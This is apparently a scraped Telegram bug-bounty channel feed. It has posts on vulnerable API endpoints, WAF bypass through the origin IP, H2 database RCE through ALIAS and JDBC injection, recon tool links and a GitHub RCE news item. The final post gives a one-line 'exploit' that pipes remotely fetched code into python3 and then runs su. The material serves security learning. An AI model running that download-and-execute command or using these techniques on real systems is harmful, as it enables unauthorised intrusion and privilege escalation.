Hey Hunterβs,
DarkShadow is here back again!
Ranking Most common /api vulnerable endpoints:
(not only /api/v1 also test for /api/v2)
π€«if WAF blocks your request then find ip origin and it might works with out bypassing by any extra waf bypass payloads!!!
#bugbountytips #info_leak
DarkShadow is here back again!
Ranking Most common /api vulnerable endpoints:
/api/v1/users
/api/v1/users/{userId}
/api/v1/oauth/token
/api/v1/forgot-password
/api/v1/debug or /api/v1/status
(not only /api/v1 also test for /api/v2)
π€«if WAF blocks your request then find ip origin and it might works with out bypassing by any extra waf bypass payloads!!!
#bugbountytips #info_leak
π₯8β€1
Recon β Scan β Exploit β Report (automated)
β’ Subdomains (15+ sources)
β’ Nuclei + CVE scan
β’ JS secrets + GitHub leaks
β’ DNS takeover + misconfigs
β’ AI agent (FREE)
β’ Results β Cloudflare R2
Stop manual recon.
https://github.com/h0tak88r/AutoAR
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - h0tak88r/AutoAR: AutoAR is an automated security reconnaissance tool, ASM and Discord bot for bug bounty hunters and penetrationβ¦
AutoAR is an automated security reconnaissance tool, ASM and Discord bot for bug bounty hunters and penetration testers. It automates gathering subdomains, scanning ports, detecting technologies, m...
π₯9β€7π2
10 Free Coupons for New Learners--->
Please open Telegram to view this post
VIEW IN TELEGRAM
topmate.io
Web Application Bug Bounty Methodology with Saumadip Mandal
Pro hacker's playbook: recon, XSS, SQLi, SSRF & more
π2β€1
Hey Hunter's,
DarkShadow is here back again!
π¨ Import schema from H2 Database β RCE via EXEC Alias β‘
Creating an alias to execute system commands via Java Runtime
π Quick Analysis:
ο»Ώ
π§ Bug Bounty Tips:
So guys if you really enjoy to read such methods show your love β€οΈ
#bugbountytips #rce
DarkShadow is here back again!
π¨ Import schema from H2 Database β RCE via EXEC Alias β‘
Creating an alias to execute system commands via Java Runtime
π Quick Analysis:
- Default oken validation
- H2 database exposed with unsafe configurations
- Ability to create custom ALIAS β leads to RCE
- No proper input validation or restriction on JDBC params
ο»Ώ
π§ Bug Bounty Tips:
- Always check hidden/internal endpoints like "/getSchema", "/actuator", "/env"
- Look for H2 / embedded DB usage β often misconfigured
- Try injecting JDBC params (INIT, TRACE, etc.)
- Donβt ignore default tokens or exposed headers
- Think beyond SQLi β DB features themselves can be weaponized
So guys if you really enjoy to read such methods show your love β€οΈ
#bugbountytips #rce
β€7π±5
π₯ Ultimate Bug Bounty Goldmine β 1000+ Real Writeups
XSS, CSRF, SSRF, IDOR, SQLi, RCE⦠everything in one place.
Real reports from Google, Facebook, PayPal, Microsoft & more.
Perfect for learning real-world exploitation, not just theory.
GitHub: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
XSS, CSRF, SSRF, IDOR, SQLi, RCE⦠everything in one place.
Real reports from Google, Facebook, PayPal, Microsoft & more.
Perfect for learning real-world exploitation, not just theory.
GitHub: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
GitHub
GitHub - devanshbatham/Awesome-Bugbounty-Writeups: A curated list of bugbounty writeups (Bug type wise) , inspired from https:β¦
A curated list of bugbounty writeups (Bug type wise) , inspired from https://github.com/ngalongc/bug-bounty-reference - devanshbatham/Awesome-Bugbounty-Writeups
β€5π₯4
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
Please open Telegram to view this post
VIEW IN TELEGRAM
β€6π3
π Free Coupons for the New Learners https://topmate.io/saumadip/2054509?coupon_code=awxe
topmate.io
Web Application Bug Bounty Methodology with Saumadip Mandal
Pro hacker's playbook: recon, XSS, SQLi, SSRF & more
β€3π₯1
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - mrmtwoj/apache-vulnerability-testing: Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024β¦
Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024-39573 , CVE-2024-38477 , CVE-2024-38476 , CVE-2024-38475 , CVE-2024-38474 , CVE-2024-38473 , CVE-2023-38709 - mrmt...
β€7π1
π¦ CloudFox helps you gain situational awareness in unfamiliar cloud environments. Itβs an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
https://github.com/BishopFox/cloudfox
https://github.com/BishopFox/cloudfox
β€8π3π₯3
Getting very very good responses on the Web Application Bug Bounty Methodology pdf book. Thanks Everyone for the support !
Here is 10 coupons who want to grab it for free -- https://topmate.io/saumadip/2054509?coupon_code=qwerty
Here is 10 coupons who want to grab it for free -- https://topmate.io/saumadip/2054509?coupon_code=qwerty
β€4π₯2
Brut Security
Getting very very good responses on the Web Application Bug Bounty Methodology pdf book. Thanks Everyone for the support ! Here is 10 coupons who want to grab it for free -- https://topmate.io/saumadip/2054509?coupon_code=qwerty
Please open Telegram to view this post
VIEW IN TELEGRAM
1β€8π₯1π1
Reconnaissance- Phase1.pdf
1.5 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
β€9π₯4π¨βπ»1
π₯ GitHub RCE via single git push!
CVE-2026-3854: Unsanitized push options let attackers run commands on backend servers, bypassing sandboxing (cross-tenant risk).
π Learn how header injection led to full compromise β https://thehackernews.com/2026/04/researchers-discover-critical-github.html?m=1
CVE-2026-3854: Unsanitized push options let attackers run commands on backend servers, bypassing sandboxing (cross-tenant risk).
π Learn how header injection led to full compromise β https://thehackernews.com/2026/04/researchers-discover-critical-github.html?m=1
π₯8π6β€4
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!
π¨History Breaking exploitπ³
CVE-2026-31431 (nickname: copy fail)
A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!!
Exploit code:
Guys, AI is going to be very dangerousπ¨
Don't forget to follow me x.com/darkshadow2bd
#exploit #bugbountytips #linux
DarkShadow is here back again!
π¨History Breaking exploitπ³
CVE-2026-31431 (nickname: copy fail)
A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!!
Exploit code:
curl copy.fail/exp | python3 && su
Guys, AI is going to be very dangerousπ¨
Don't forget to follow me x.com/darkshadow2bd
#exploit #bugbountytips #linux
β€7π₯4π2